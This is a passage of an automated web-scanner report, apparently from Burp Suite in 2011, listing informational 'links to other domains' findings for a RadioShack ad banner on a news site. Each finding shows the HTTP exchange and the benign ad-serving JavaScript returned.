http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.126. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.127. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296266789

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.128. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.129. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.130. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1043697033?
